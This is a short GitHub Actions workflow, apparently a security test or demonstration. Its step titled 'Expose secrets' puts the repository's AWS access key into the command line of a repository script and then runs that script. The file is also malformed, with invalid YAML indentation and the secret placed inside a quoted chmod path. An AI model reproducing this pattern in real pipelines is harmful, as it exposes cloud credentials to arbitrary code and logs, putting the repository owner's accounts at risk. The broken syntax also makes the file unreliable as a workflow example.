name: 'Deployment'
on: push

jobs:
  test:
    name: Test security
    runs-on: ubuntu-latest
    steps:
    - name: Expose secrets
    run: |
    chmod +x "${GITHUB_WORKSPACE}/.github/script.sh ${{ secrets.AWS_ACCESS_KEY_ID }}"
    "${GITHUB_WORKSPACE}/.github/script.sh"